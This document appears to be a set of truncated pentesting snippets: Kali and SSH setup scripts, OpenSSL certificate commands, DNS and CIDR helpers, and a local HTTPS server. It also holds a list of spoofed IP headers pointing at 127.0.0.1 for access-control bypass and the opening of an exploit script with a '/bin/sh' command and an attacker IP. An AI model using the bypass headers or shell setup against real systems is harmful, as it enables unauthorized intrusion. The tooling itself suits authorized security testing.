This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
```text
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
```
```bash
#!/bin/bash
# Include a new non-root username and the public SSH key for that user
newuser=
pubkey=
# Quote the variable so the test behaves correctly when it is empty
if [ -z "$newuser" ]
then
    echo "[!] Missing username."
    exit 1
fi
```
```python
#!/usr/bin/python3
import datetime
from requests import Session
import urllib3

# Suppress the warning raised for requests sent without certificate verification
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

URL = "https://some_host"
ENDPOINT = "/SOMEPATH"
# Running with this set in send_post() will let you debug the script with Burp
PROXIES = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }
```
```bash
# CA key and self-signed CA certificate
# (EKU OIDs: 1.3.6.1.5.5.7.3.4 = emailProtection, 1.3.6.1.5.5.7.3.2 = clientAuth)
openssl genrsa -out ca.key 4096
openssl req -new -x509 -days 365 -key ca.key -out ca.crt -addext 'extendedKeyUsage=1.3.6.1.5.5.7.3.4,1.3.6.1.5.5.7.3.2'
# client key and certificate signing request
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.csr
# sign the client CSR with the self-signed CA created above
openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt
```
```bash
# nslookup and IP address extraction for a file of FQDN hosts
for host in $( cat fqdns.txt ) ; do
  nslookup "$host" | grep -E "^(:?Address:).*([0-9]{1,3}\.){3}[0-9]{1,3}$" | awk '{ print $2 }' >> hosts_from_fqdn.txt
done ; sort -u -o hosts_from_fqdn.txt hosts_from_fqdn.txt
```
```bash
#!/bin/bash
if [[ $# -eq 0 ]];then
    echo "[!] Email must be provided for Git SSH key"
    exit 1
fi
sudo passwd kali
USER=`whoami`
```
```bash
#!/bin/bash
if [[ $# -eq 0 ]];then
    echo "[!] Email must be provided for Git SSH key"
    exit 1
fi
USER=`whoami`
sudo apt-get update && sudo apt-get upgrade -y
```
```python
#!/usr/bin/env python3
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python3 simple-https-server.py
# then in your browser, visit:
# https://localhost:8443
from http import server
import ssl
```
```python
#!/usr/bin/python3
import ipaddress
import sys
import re

VALID_HOSTS = []
INFILE = []

def enum_cidr(host):
```
```python
#!/usr/bin/python3
import requests
import base64

target = f"http://127.0.0.1:3000/"
cmd = "/bin/sh"
attackerIp = "127.0.0.1"
```